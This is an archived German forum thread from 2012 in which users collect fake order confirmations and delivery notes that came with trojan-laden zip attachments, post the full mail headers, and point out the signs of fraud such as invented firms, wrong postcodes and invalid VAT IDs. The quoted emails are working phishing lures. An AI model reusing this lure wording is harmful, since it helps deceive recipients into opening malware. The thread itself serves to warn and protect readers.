PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Virus] Neue Bestellung / Lieferschein für xxx / Mahnung



deekay
02.05.2012, 08:29
From - Wed May 02 07:05:54 2012
X-Account-Key: account2
X-UIDL: 9b7c0a7482f0294aeb128dde63128cf4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <fmwpn369 [at] ybb.ne.jp>
X-Envelope-To: <^^@^^^^.^^>
X-Delivery-Time: 1335934685
X-UID: 37657
Return-Path: <fmwpn369 [at] ybb.ne.jp>
X-RZG-FWD-BY: ^^@^^^^.^^
Received: from mailin.rzone.de (jored mi73) ([unix socket])
by mailin.rzone.de (jored mi73) (RZmta 28.16) with LMTPA;
Wed, 2 May 2012 06:57:58 +0200 (CEST)
X-RZG-CLASS-ID: mi
Received: from ybbsmtp506.mail.kks.yahoo.co.jp ([183.79.29.145])
by mailin.rzone.de (jored mi73) (RZmta 28.16 OK)
with SMTP id L07cc1o4244tr3 for <^^@^^^^.^^>;
Wed, 2 May 2012 06:57:56 +0200 (CEST)
Received: (qmail 35967 invoked by alias); 2 May 2012 04:57:53 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ybb.ne.jp; s=ybb20110701; t=1335934673; bh=VZI9eoTBW1s6g5zJxXFFj7ScqOELRXVJ/FVkZxTXAwc=; h=Received:X-Apparently-From:MIME-Version:Date:X-Priority:X-Mailer:Subject:From:To:Content-Type:Message-ID; b=EFzujUo2S9ahqvFtVlI2W0fPuYIN0HP4NwcnxRFwq1SzacL/49eku6PdQTKb4sMFleFa8n1sOR9dkCQCCLceQVAHbKMyc9LjBs0MeqxTcPYmDxRikFc1+/LzTNkqLWCGMmxjRIaxtffPU8gXMB2GQrxNvKKDuPz5QP+y0v1Cl8g=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=ybb20110701; d=ybb.ne.jp;
h=Received:X-Apparently-From:MIME-Version:Date:X-Priority:X-Mailer:Subject:From:To:Content-Type:Message-ID;
b=KcFcXAeZPZyZuohOUd3Beeslo84uqLNIhu6XnfHoznNqf+u6N3r+vJKlWXK8//HVr4I+vv7/5trpcQTU2lLevnstEhWMh3YinBaBYTwI8nSpr5Bw8TiA2tycqNK34yn2XAR4b2pCpnujDFhTMKryLJSK odMvHUYhjiGHlnI9rjQ= ;
Received: from unknown (HELO servidor) (87.216.166.244 with login)
by ybbsmtp506.mail.kks.yahoo.co.jp with SMTP; 2 May 2012 04:57:53 -0000
X-Apparently-From: <dreamsykyk [at] yahoo.co.jp>
MIME-Version: 1.0
Date: Wed, 02 May 2012 06:57:56 +0200
X-Priority: 3 (Normal)
X-Mailer: Mailman v2.0.8
Subject: Neue Bestellung 510397699 D. Kl??r
From: fmwpn369 [at] ybb.ne.jp
To: "D. Kl??r" <^^@^^^^.^^>
Content-Type: multipart/mixed;
boundary="-----_chilkat_dfe_08c1_d564d53b.9455f1d8_.MIX"
Message-ID: <CHILKAT-MID-edb91531-4f1b-5712-7130-baf7e02b0f1a [at] servidor>

Verehrte(r) D. ee??kay,

vielen Dank für Ihre Bestellung bei Rtlshop.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Deine Bestellnummer 06870982542
Artikel: Sony 7648524831 850,45 Euro
Rechnungsname: D. ee??kay
Zahlungsmethode: Paypal

Versandadresse und detaillierte Vertragsdetails finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage entzogen.
Kaufeinzelheiten und Widerspruch Möglichkeiten finden Sie in beigefügtem Anhang.


Ihr Kundenservice

Alster GmbH
................
............ ...............

Telefon: (+49) ........................
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Stuttgart
Umsatzsteuer-ID: DE891905025
Geschäftsfuehrer: A.V.

Im Anhang findet sich eine zip Datei in der sicherlich ein kleiner Trojaner lauert. Da ich nicht weiss ob die Alster GmbH existent ist habe ich das anonymisiert. Hier ist noch eine Mail dieser Art:

From - Wed May 02 03:45:54 2012
X-Account-Key: account2
X-UIDL: 821a981f1c73e15c2ac973e67bbdc1e3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <jlham [at] iinet.net.au>
X-Envelope-To: <^^^^^^^^^^>
X-Delivery-Time: 1335922989
X-UID: 37655
Return-Path: <jlham [at] iinet.net.au>
X-RZG-CLASS-ID: mi
Received: from outbound.icp-qv1-irony-out4.iinet.net.au ([203.59.1.104])
by mailin.rzone.de (joses mi156) (RZmta 28.16 OK)
with ESMTP id d07286o41MaaXW for <^^^^^^^^^^^^^^^^>;
Wed, 2 May 2012 03:43:06 +0200 (CEST)
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AilqAI6QoE8/51wQ/2dsb2JhbABEgg+DLIVjlwiMb2WDAoEHggQBEwEBTQEuCAIBEDsSAQREHQECAwGFNweCKBaZKKBsE4Yxi kQEiDA0hhOBIxOLaQOKJ4MH
X-IronPort-AV: E=Sophos;i="4.75,515,1330876800";
d="exe'96?zip'96,48?scan'96,48,208,48,96";a="32742151"
Received: from unknown (HELO server) ([63.231.92.16])
by outbound.icp-qv1-irony-out4.iinet.net.au with ESMTP/TLS/RC4-MD5; 02 May 2012 09:42:58 +0800
MIME-Version: 1.0
Date: Tue, 01 May 2012 19:42:51 -0600
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
Subject: =?iso-8859-1?Q?Lieferschein_f=FCr_Herr_Daniel_Kl=3F=3Fr?=
From: jlham [at] iinet.net.au
To: "Herr D^^^^ Kl??r" <^^^^^^e>
Content-Type: multipart/mixed;
boundary="-----_chilkat_0b5_eae2_1ce6587a.b2ee3c5b_.MIX"
Message-ID: <CHILKAT-MID-d9135b7f-5105-befb-a7e6-7d30e9bb9f06 [at] server>


Verehrte(r) Herr Dee??kay

vielen Dank für Ihre Bestellung bei schlecker.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Ihre Bestellnummer 20610793778
Artikel: Apple 3873050018 699,13 Euro
Rechnungsname: Herr Dee??kay
Zahlungsmethode: Paypal

Versandadresse und detaillierte Vertragsdetails finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage entzogen.
Rechnungsauflistung und Widerspruch Mitteilung finden Sie im Anhang.


Ihr Supportteam

Konsolenprofis GmbH
..........
........ ...........

Telefon: (+49) ...................
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Keiserslauter
Umsatzsteuer-ID: DE915295217
Geschäftsfuehrer: F. S.

Mittwoch
02.05.2012, 08:34
Ist :suspect:. Das Deutsch ist holprig, keine ernstzunehmende deutsche Firma des Versandhandels würde "Geld entzogen" schreiben, wenn eine Lastschriftbuchung gemeint ist. Die Summen jenseits von 500 Euro und der Verweis auf die Widerrufsöglichkeit im Anhang sollen den Selektionsdruck erhöhen. Eine Bestätigungsmail vom RTLShop sieht anders aus, das kann ich sicher sagen. Das gilt vermutlich auch für die Konsolenprofis.

Du kannst die Zip-Datei bei einem Online-Virenscanner einwerfen, dann hast Du Gewissheit, dass es sich um einen Trojaner handelt. Mich würde interessieren, welchen. Ich nehme als Scanner gerne http://www.virustotal.com.

thomas1611
02.05.2012, 09:03
Irgendwie passen die Webadressen überhaupt nicht zur Signatur: Schlecker und Konsolenprofis, RTLShop und Alster GmbH.

deekay
02.05.2012, 09:53
Passen tut da garnichts. ie Alster GmbH soll in München sitzen, ist aber per google nicht auffindbar. die Konsolenprofis gibt es und die sitzen in Lüneburg

Chinchilla
02.05.2012, 10:20
Gesellschaftssitz ist Keiserslauter

wie niedlich, eine "Firma" die nicht mal weiß wie man ihren Geschäftssitz scheibt :-)

PWR
02.05.2012, 10:24
Andere Variante:
Bestellung bei Computeruniverse.de
Artikel: Samsung 3134586584 653,12 Euro
Rechnungsname: mein Vor- und Nachname
Zahlungsmethode: Paypal (na klar, sollen sie mal abbuchen - bin bei Paypal nicht mal registriert)
Kundenservice einer Firma in "Hermannstal 46, 89801 Stuttgart"
(nicht mal Postleitzahl und Ort passen)

Wowoka
02.05.2012, 12:16
Konsolenprofis GmbH
..........
........ ...........

Telefon: (+49) ...................
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Keiserslauter


Komisch, den Ort Keiserslauter kannte bisher noch nicht.
Egal, ist ja eh alles nur gefakt.
Die Firmen (Konsolenprofis GmbH und Alster GmbH) sind nicht existent.
Deshalb fehlen wohl auch die HRB-Nummern im Impressum.

girli
03.05.2012, 09:43
hab soeben auch eine solche mail bekommen und mein antivirenprogramm hat auch gleich selber den troyaner erkannt und isoliert
den ahnhang habe ich nicht geöffnet aber der inhalt der mail lautet:

ach und was noch intressant ist das unter angegebener artikelnr. bei otto.de ein "GIESSWEIN, Hausschuh, »Kramsach«
ab € 24,90" zu finden ist :) ...und die postleitzahl ist in deutschland nicht auffindbar




Hallo xxxx xxxx,

vielen Dank für Ihre Bestellung bei Otto.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Deine Bestellnummer 33963187787
Artikel: Nokia 4854843168 679,22 Euro
Rechnungsname: xxxx xxxx
Zahlungsmethode: Bankeinzug

Versandadresse und detaillierte Vertragseinzeilheiten finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage abgetragen.
Bestellauflistung und Widerruf Hinweise finden Sie im zugefügten Ordner.


Ihr E-Mail-Support

Konsolenprofis GmbH
Horner Stieg 69
41904 Dortmund

Telefon: (+49)...........
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr) Gesellschaftssitz ist Bremen
Umsatzsteuer-ID: DE611973428
Geschäftsfuehrer: R. M.

ccm
03.05.2012, 11:10
Habe ebenfalls folgende Nachricht erhalten:

Received: from mail.btconnect.com ([213.123.26.188]) by xx
Tue, 1 May 2012 22:44:42 -0700
Received: from nsc69.38.51-10.newsouth.net (EHLO server.Ozment.local) ([69.38.51.10])
by c2beaomr10.btconnect.com
with ESMTP id HFR33572 (AUTH kbdraper [at] btconnect.com);
Wed, 02 May 2012 06:44:41 +0100 (BST)
MIME-Version: 1.0
Date: Wed, 02 May 2012 00:44:27 -0500
X-Priority: 3 (Normal)
X-Mailer: Apple Mail (2.552)
Subject: Ihre Bestellung 718513xxx xxxxxxx
From: kbdraper [at] btconnect.com
To: "x" <x>


Guten Tag xxxx xxxx,

vielen Dank für Ihre Bestellung bei Otto.de, nachfolgend finden Sie Ihre Bestellbestätigung.

Ihre Bestellnummer 41924852xxx
Artikel: Sony Vaio 5062346699 715,87 Euro
Rechnungsname: xxxx xxxx
Zahlungsmethode: Bankeinzug

Versandadresse und detaillierte Zahlungsdetails finden Sie im Anhang.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage entzogen.
Rechnungsdetails und Storno Möglichkeiten finden Sie im zugefügtem Zip Ordner.


Ihr Support

Walddorf GmbH
Derbyweg 46
40541 München

Telefon: (+49) 900 3301326
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Keiserslauter
Umsatzsteuer-ID: DE530603527
Geschäftsfuehrer: E. V.

RA Meier-Bading
03.05.2012, 12:02
...und ich kann mich vor Anfragen mit Forderungsabwehr kaum retten - "hab nichts bestellt, weisen Sie die in die Schranken!".
Rund die Hälfte der Betroffenen hat die Anhänge geöffnet. Immerhin war die andere Hälfte vorsichtig genug.

deekay
03.05.2012, 12:13
http://www.heise.de/newsticker/meldung/Kriminelle-locken-mit-gefaelschten-Rechnungen-in-die-Virenfalle-1566365.html

Frechdachs
03.05.2012, 12:24
Moin zusammen,

genau den Mist habe ich auch grade bekommen.
Die Umsatzsteuer-ID: DE195930709 hat leider eine falsche Prüfsumme. :greedy_dollars:

Und dann noch >>>Dein Lieferschein Nr. 11653858,
ich wüsste nicht, denen das Du angeboten zu haben.:p

Und natürlich die Zipdatei im Anhang.
Die VZ warnt auch davor. http://www.vz-nrw.de/UNIQ133604221117345/trojaner-im-anmarsch-vorsicht-vor-e-mail-mit-gefaehrlichem-zip-anhang

Grüße
Frechdachs



Guten Tag sehr geehrte/r Kunde,

Danke für Ihre Bestellung bei hichrono.de, nachfolgend finden Sie Ihre Vertragsbestätigung.

Ihre Transaktionsnummer: 049649563860
Artikel: Samsung 3495648195 957,23 Euro

Zahlungsmethode: Bankeinzug

Rechnungsname, Versandadresse und detaillierte Zahlungsdetails finden Sie zwecks Securitymassnahmen im Anhang.

Die Buchung wurde autorisiert und wird innerhalb 4 Tage entzogen.
Rechnungseinzelheiten und Stornierung Möglichkeiten finden Sie in beigefügtem Anhang.


Ihr Kundensupport

Ixxen GmbH
Horner Stieg 65
89290 Kiel

Telefon: (+49) 561 1110871
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Augsburg
Umsatzsteuer-ID: DE195930709
Geschäftsfuehrer: F.S.
Return-Path: <jbrophy [at] suddenlink.net>
Received: from txofep02.suddenlink.net (txofep02.suddenlink.net [208.180.40.72])
by mtain-me03.r1000.mx.aol.com (Internet Inbound) with ESMTP id C395938000098
for <name [at] provider.de>; Thu, 3 May 2012 05:47:38 -0400 (EDT)
Received: from proxy.sucasaproduce.com ([67.212.206.166])
by txofep02.suddenlink.net
(InterMail vM.8.04.00.01 201-2329-100-103-20120206) with ESMTP
id <20120503094737.EXJH15167.txofep02.suddenlink.net [at] proxy.sucasaproduce.com>
for <name [at] provider.de>; Thu, 3 May 2012 04:47:37 -0500
MIME-Version: 1.0
Date: Thu, 03 May 2012 15:57:20 -0700
X-Priority: 3 (Normal)
X-Mailer: Ximian Evolution 2.3.1 (2.0.1-6)
Subject: Dein Lieferschein Nr. 11653858
From: jbrophy [at] suddenlink.net
To: name [at] provider.de
Content-Type: multipart/mixed;
boundary="-----_chilkat_fcc_2c42_3777b999.7ff23d93_.MIX"
Message-ID: <CHILKAT-MID-9ee787a3-a4f0-f8bd-5d1c-f5b89dceeaba [at] proxy.sucasaproduce.com>
X-Cloudmark-Analysis: v=1.1 cv=e4+nN7JFyidPqtjm7QRibqntUT6DPKhMpvIMSrLb7TA= c=1 sm=0 a=xzW3HwPJiLYA:10 a=dyzuP2Gy4iEA:10 a=TF_aTyEftx2he4c34eEA:9 a=wPNLvfGTeEIA:10 a=yCCnGPpD6nYA:10 a=c-rcnhRYuesxVovy9O0A:9 a=IKIoO-ieCDEA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5400.1158/80522
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:212851728:93952408
X-AOL-SCOLL-URL_COUNT: 0
x-aol-sid: 3039ac1d608b4fa2543a0e72
X-AOL-IP: 208.180.40.72
X-AOL-SPF: domain : suddenlink.net SPF : none
X-Antivirus: avast! (VPS 120503-0, 03.05.2012), Inbound message
X-Antivirus-Status: Clean

Helmi98
03.05.2012, 20:37
Irgendwie bringen DIE aber die Postleitzahlen ganz schön durcheinander! :) :)

4xxxx für München, 89xxx für Kiel und auch hier 81xxx für Bremen:

http://www.gutefrage.net/frage/schon-wieder-betrug

blizzy
03.05.2012, 21:40
Postleitzahlen, Artikelnummern und Firmen sind irrelevant. Einzig wichtig ist die recht hohe "Rechnungs"summe. Die soll erst mal schocken und zum schnellen Klick auf den Anhang verleiten. Das ist das Ziel der Spammer.

Helmi98
03.05.2012, 23:10
Das stimmt leider! Ich habe auch erst später gemerkt, dass die Postleitzahl gar nicht zum Ort passt.

ToHo
08.05.2012, 21:56
Hallo, ich habe heute folgende seltsame Mail erhalten:

Von: dad4christ [at] suddenlink.net
An: ........
Betreff: Anmeldebeitrag Ihrer Bank-Karte
Datum: Tue, 08. May 2012 16:18:21

Hallo lieber Kunde/Kundin,

wir sind höchst erfreut Ihnen mitteilen zu können, das Ihr Karten-Antrag bearbeitet wurde. Sie erhalten Ihre Karte in den nächsten Tagen, Ihre Pin wird separat zugestellt. 129,49 Euro für 24Monate Mitgliedsbeitrag werden Ihnen in Kürze von Ihrem Bankkonto abgeschrieben. Ihr Kartenlimit ist auf 3000 Euro gesetzt. Rechnungsauflistung finden Sie in Beilage.

Zeitman GmbH
Rattenweg 98
57013 Biedenkopf

Telefon: (+49) 181 9183305
(Mo-Fr 8.00 bis 18.00 Uhr| Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Köln
Umsatzsteuer-ID: DE050700122
Geschäftsfuehrer: J* M*


angehängt ist ein zip-file, dass eine datei "Auszug.exe" enthält. Ich habe die Datei mit Avast und malwarebytes geprüft, beide sagen sauber. Trotzdem ist das eindeutlig was spammiges, da das eine executable ist. Ist auch vom Spamfilter meines Emailclients ausgefiltert worden.

Kann jemand was dazu sagen bzw. weiss jemand was das ist? In Google war unter dem Stichwort "Zeitmann Gmbh" nichts zu finden, scheint also was ganz neues zu sein

Schöne Grüße

Tom

wahwah
08.05.2012, 21:59
Willkommen im Forum!

Bitte mal den Header der Mail posten.

Danke.

ToHo
08.05.2012, 22:08
Bitte mal den Header der Mail posten.

Danke.

wollte ich auch tun, weiss nur nicht wie man den bei GMX anzeigt. weist du, wie ich den vollständigen Header bei GMX angezeigt kriege? Unter Optionen habe ich nichts gefunden...

wahwah
08.05.2012, 22:12
Das Symbol oben rechts über "ins Adressbuch" anklicken.

Neben dem Symbol "Speichern" und "Drucken".

ToHo
08.05.2012, 22:15
Danke, habs gefunden. Hier isser:

Return-Path: <dad4christ [at] suddenlink.net>
Delivered-To: GMX delivery to ...... [at] gmx.net
Received: (qmail invoked by alias); 08 May 2012 14:04:48 -0000
Received: from txofep01.suddenlink.net (EHLO txofep01.suddenlink.net) [208.180.40.71]
by mx0.gmx.net (mx076) with SMTP; 08 May 2012 16:04:48 +0200
Received: from server ([212.142.226.177]) by txofep01.suddenlink.net
(InterMail vM.8.04.00.01 201-2329-100-103-20120206) with ESMTP
id <20120508140445.CCOQ29036.txofep01.suddenlink.net [at] server>
for <...... [at] gmx.net>; Tue, 8 May 2012 09:04:45 -0500
MIME-Version: 1.0
Date: Tue, 08 May 2012 16:18:21 +0200
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
Subject: Anmeldebeitrag Ihrer Bank-Karte
From: dad4christ [at] suddenlink.net
To: ....... [at] gmx.net
Content-Type: multipart/mixed;
boundary="-----_chilkat_7cb_85db_a8546dc7.1029e2a5_.MIX"
Message-ID: <CHILKAT-MID-2e9d4367-dd89-d99c-de9f-8dc0bb2602ab [at] server>
X-Cloudmark-Analysis: v=1.1 cv=6p5BqBp3VK6p0jBnMk5o/Dt6mLrqbqrhBjCrXBaOSr4= c=1 sm=0 a=tRQK8EYLUZkA:10 a=xzW3HwPJiLYA:10 a=rTN5Y5ykDHAA:10 a=ivsTrB8WoHAA:10 a=RdVfM2mDbkQdFVvfaYQA:9 a=wPNLvfGTeEIA:10 a=_W_S_7VecoQA:10 a=5tOV--oKambfLiWg1AcA:9 a=IKIoO-ieCDEA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 5 (eXpurgate);
Detail=5D7Q89H36p7RD0ZwpkL6+eQgmvCvQtD8m3P+GXPd9c9SJtGqry75twFzJR8y+togC8CdC
YISqohvp6/BH8TJIxyx67CyTLu1Otn61+PIYk5Vl9O9ffqxWMD7DkBhyr1RuMvMIOYDM8OvEQ5tB
MWv3AGcdBJ128o6CscpWCFeq2NbWUG9yK3rWrLB9pW2i4OhkEdsiEmVuPXPIGhGamHPmQ==V1;
X-GMX-UID: b3VpM8FcDGRtY63K2W9genspL2/E6w0o
X-Flags: 1401

Arthur
08.05.2012, 22:20
Zeitman GmbH
Rattenweg 98
57013 Biedenkopf
Der Name der angeblichen GmbH und die Adresse ist freie Erfindung

Biedenkopf hat die PLZ 35216 und den Ungezieferweg gibt es dort nicht

ToHo
08.05.2012, 22:30
Der Name der angeblichen GmbH und die Adresse ist freie Erfindung

Biedenkopf hat die PLZ 35216 und den Ungezieferweg gibt es dort nicht

dachte ich mir, klang gleich komisch.

@ wahwah: das anonymisieren des GF-Names in meinem ersten Post war wahrscheinlich unnötig, der dürfte auch frei erfunden sein...

Mich würde vor allem interessieren, was die exe-file tut, wenn mann doof genug ist sie zu öffnen. Warum sagen meine antivirenprogramme dazu nichts? Ich denke mal das ist nur etwas bekanntes in neuem Kleid?

Wuschel_MUC
08.05.2012, 22:38
Warum sagen meine antivirenprogramme dazu nichts?
Der Absender wird seine Schadware so verfasst haben, dass die gängigen Virenprogramme nicht darauf anschlagen. Deshalb ist es wichtig, die Mail möglichst sofort einem Virenscanner-Hersteller zu schicken.

Dein Virenscanner-Hersteller hat bestimmt eine E-Mail-Adresse, an die man ihm das Zeug schicken kann. McAfee möchte solche E-Mails eingezippt und mit dem Passwort "suspect" verschlüsselt erhalten. Einzippen und Verschlüsseln ist wichtig, damit die Schadware nicht versehentlich gestartet werden kann.

Fackle nicht lang - jeder Tag Zögern erhöht die Opferzahl.

Wenn dein Virenscanner regelmäßig upgedatet wird, aber auch in einer Woche nicht anschlägt, solltest du dir einen anderen besorgen. Die Mail stinkt heftig nach Schadware.

Wuschel

Fidul
08.05.2012, 22:41
Scheint eine Variante hiervon zu sein: <schnipp> Getackert, danke für den Hinweis

ToHo
08.05.2012, 22:54
D. Deshalb ist es wichtig, die Mail möglichst sofort einem Virenscanner-Hersteller zu schicken.

Dein Virenscanner-Hersteller hat bestimmt eine E-Mail-Adresse, an die man ihm das Zeug schicken kann. .

Wuschel

habe ich getan und das ding an Avast! geschickt! Danke für den Hinweis!

Arthur
08.05.2012, 23:03
Es gab übrigens mal eine Zeitmann GmbH (http://books.google.de/books?id=sD5lWtYMwBEC&pg=PA122&lpg=PA122&dq=%22Zeitmann+GmbH%22&source=bl&ots=zndd4LP3OF&sig=FzkwVnstYwXje50-tKH0xBQRLkU&hl=de&sa=X&ei=hImpT9SmGIbCtAaiyIlv&sqi=2&ved=0CCMQ6AEwAA#v=onepage&q=%22Zeitmann%20GmbH%22&f=false) aber das ist über 10 Jahre her
und außerdem in Mannheim ...

Kilian99
08.05.2012, 23:52
E-Mail mit Zip.Datei als Anhang

From: - Tue May 08 23:37:38 2012
X-Account-Key: account3
X-UIDL: sm_00011540_b4d7704d32bd40648756ebe2d31d897e
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <***>
Received: from [82.235.199.161] (mer76-1-82-235-199-161.fbx.proxad.net [82.235.199.161]) by mail.bghosting01.de with SMTP; Tue, 8 May 2012 22:53:37 +0200
Message-ID: <146889800455896775961979 [at] dgcc.mcu.es>
From: niall wilfred <***>
To: <info@*********.de>
Subject: Re:Zahlung
Date: 8 May 2012 21:21:37 +0100
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="---B31C6B812EC4F6C46B1CF659B381B31C"
X-Mailer: Weuvjqn eiupjf
X-SmarterMail-Spam: SPF_None, SORBS - Dynamic IP, UCEProtect Level 1, Bayesian Filtering, ISpamAssassin 0 [raw: 0], DK_None, DKIM_None
X-SmarterMail-TotalSpamWeight: 8
X-AntiVirus: checked (incoming) by AntiVir MailGuard (Version: 10.0.1.42; AVE: 8.2.10.62; VDF: 7.11.29.114)



Verehrte(r) Kunde/Kundin,

Ihr Account wurde aktiviert.
692,44 Euro Teilnehmerbeitrag ist ab sofort zu begleichen.

Die Bezahlung wird innerhalb 2 Tagen abgebucht.
Sie werden in nächsten Tagen angerufen und ein Lieferzeitpunkt wird ausgemacht.
Bestelleinzelheiten und Stornierung Erklärung finden Sie im Zusatzordner in der E-Mail.

Aurea GmbH
Bergmannring 02
60307 Keiserslauter

Telefon: (+49) 056 9244045
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Ahrensburg
Umsatzsteuer-ID: DE911402331
Geschäftsfuehrer: ***

Mittwoch
09.05.2012, 00:02
E-Mail mit Zip.Datei als Anhang
Ist (nach Vermutung einiger Experten) ein ziemlich übler Trojaner, der sich per Social Engineering zu verbreiten sucht. Den Anhang bitte auf keinen Fall öffnen! Zur Zeit feuern die aus allen Rohren, ich habe das an den passenden Thread angehängt und Deinen Beitrag anonymisiert.

Dass der Virenscanner von GMX allerdings ruhig bleibt, ist mir ein Rätsel. Diese Masche wird im deutschsprachigen Raum seit wenigen Tagen derart massiv gefahren, dass man schon eine gute Heuristik alleine für einen Wortfilter hätte.

Schönen Gruß
Mittwoch

bastian.k.1989
15.05.2012, 10:38
Mich würde vor allem interessieren, was die exe-file tut, wenn mann doof genug ist sie zu öffnen. Warum sagen meine antivirenprogramme dazu nichts? Ich denke mal das ist nur etwas bekanntes in neuem Kleid?

@ToHo: da kann ich dir sagen meinem Bruder ist das passiert, erst geschieht einfach nix und nach ca 10-15 min wird dein Rechner "Gesperrt" wegen krimineller inhalte, Pornographischen inhalten etc....

Hier sollst du noch mals 100 Euro bezahlen um die sperre wieder aufzuheben. Da hat nur ein Virenscann geholfen

Katzina
17.05.2012, 19:38
Hallo, liebe User, bin hier neu im Forum, habe leider wenig Ahnung von Hard- und software.
Habe in den vergangenen 3 Tagen auch schon 2 Spammailes erhalten von "flaviolink [at] oul.com.br. (Absender Konsoleprofis Bremen, Zwischenhändler cyberport - PLZ und Tel.-Nr. waren auch nicht korrekt.
Nun habe ich dummerweise den Anhang geöffnet bei der ersten Mail. Wie gefährlich ist das? Ich mache kein Onlinebanking.
Habe später erst mit einem Virenprogramm "spybots " den Rechner durchlaufen lassen,es fand 2 Cookies bei den Internetbrowsern "Chrom und "Explorer", die ich dann löschte.
Leider kenne ich mich gar nicht aus.
Die 2. Mail dieser Art habe ich ungelesen gleich gelöscht.
Nun lese ich hier etwas von "anonymisieren" - wie macht man das?
Auch die Kopfzeile einer Mail, wo sich die IP oder ID (?) Andresse befindet, wie kann ich die öffnen, ohne den verdächtigen Anhang öffnen zu müssen?.

Vielen Dank im voraus.
Katzina
Eigentlich sollte das eine Frage werden, finde aber im Forum nicht die Stelle, wo man eine Frage stellen kann, sorry.

truelife
17.05.2012, 20:01
Hallo Katzina,

bitte folge dieser Anleitung und poste das Ergebnis hier:

http://www.trojaner-board.de/51130-anleitung-hijackthis.html

Chinchilla
17.05.2012, 21:00
angehängt ist ein zip-file, dass eine datei "Auszug.exe" enthält. Ich habe die Datei mit Avast und malwarebytes geprüft, beide sagen sauber.

Im ZIP-File verpackt, da die Datei damit an vielen Virenscannern vorbei kommt. Mit Sicherheit ist ein Schädling enthalten, auch wenn die Scanner ihn (noch) nicht erkennen! Finger weg von der Datei!

Oberlix8
17.05.2012, 21:18
Hallo

Ich hab auch was in meinem Spamordner gefunden.

Hier mal der erweiterte Header:
(Meine Mailadresse habe ich herausgelöscht.)
Erweiterte E-Mail Informationen
Return-Path: whskagn0720 [at] naver.com
Received: from tmailpost19-2.nm.naver.com ([114.111.39.71]) by mx-ha.web.de (mxweb005) with ESMTP (Nemesis) id 0M9IQ2-1SNyrr3hq2-00DAfj for <>; Thu, 17 May 2012 20:39:12 +0200
Received: from [114.111.32.200] ([114.111.32.200]) by tmailpost19-2.nm.naver.com ([10.25.246.50]) with ESMTP id 1337279978.548498.4152249232.tmailpost19-2 for <>; Fri, 18 May 2012 03:39:38 +0900 (KST)
Received: from [61.33.11.18] ([61.33.11.18]) by a51506.nm.naver.com ([202.131.27.107]) with ESMTP id 1337279947.226754.3258973072.a51506 for <>; Fri, 18 May 2012 03:39:07 +0900 (KST)
MIME-Version: 1.0
Date: Fri, 18 May 2012 03:45:50 +0900
X-Priority: 3 (Normal)
X-Mailer: The Bat! (v2.00.3) Personal
Subject: Artikelbestellung 2687021796
X-TERRACE-DUMMYSUBJECT: Terrace Spam system *
X-TERRACE-DUMMYSUBJECT: Terrace Spam system *
From: whskagn0720 [at] naver.com
To:
Content-Type: multipart/mixed; boundary=-----_chilkat_782_3a57_00e62da5.555eeceb_.MIX
Message-ID: <CHILKAT-MID-5742ffdb-b0e4-1752-9adb-b5f8b5250151 [at] server>
X-TERRACE-SPAMMARK: NOT spam-marked. (by Terrace)
X-TERRACE-SPAMMARK: NOT spam-marked. (by Terrace)
Envelope-To: <>
X-UI-Filterresults: ;V01:K0:If3bsETF:fs2Sm3bK86F8MvrBVdJ7cevwGYHtTu22nAq lDsy+FuBPwKNKYA0+csds/X7VV+tj3pNIcu98jLBGZUQTCFS0c6cAY8jyu3ggOSOi2zH+ZV ue6iqOfrZWFLDf6L7JnfrVRhOwpcpWUBukLPvPm0IOjNibK53E+21ETxNU4RKLHTco/CJ8s 1RIhjV0aWn0nJoGzov1uZ9P9sFvEl147FaRa6kzrZQX87U20WI4Odr1VvpAyw+KWSq8ZvZv rkqJOy1y/JlXqVQJxVgWecBp/L9Lno2ODz/oJCO/RXNhv239Uew=
Ordner: Spam
Größe: 42 KB


Das ist der Text:


Sehr geehrte Damen und Herren,

Besten Dank für Ihren Kauf bei Mall73, nachfolgend finden Sie Ihre Bezahbestätigung.

Deine Vertragsnummer: 158849547687
Artikel: DWL-ANTK240500 6083499685 5192,67 Euro
Rechnungsname: Wie in Rechnungsdaten dargestellt


Zahlungsmethode: Mastercard

Versandadresse und detaillierte Rechnung finden Sie aus Sicherheitsgründen in beigefügter Datei.

Die Zahlung wurde autorisiert und wird innerhalb 4 Tage entzogen.
Bezahleinzelheiten und Stornierung Hinweise finden Sie im zugefügtem Zip Ordner.


Ihr Kundenberater

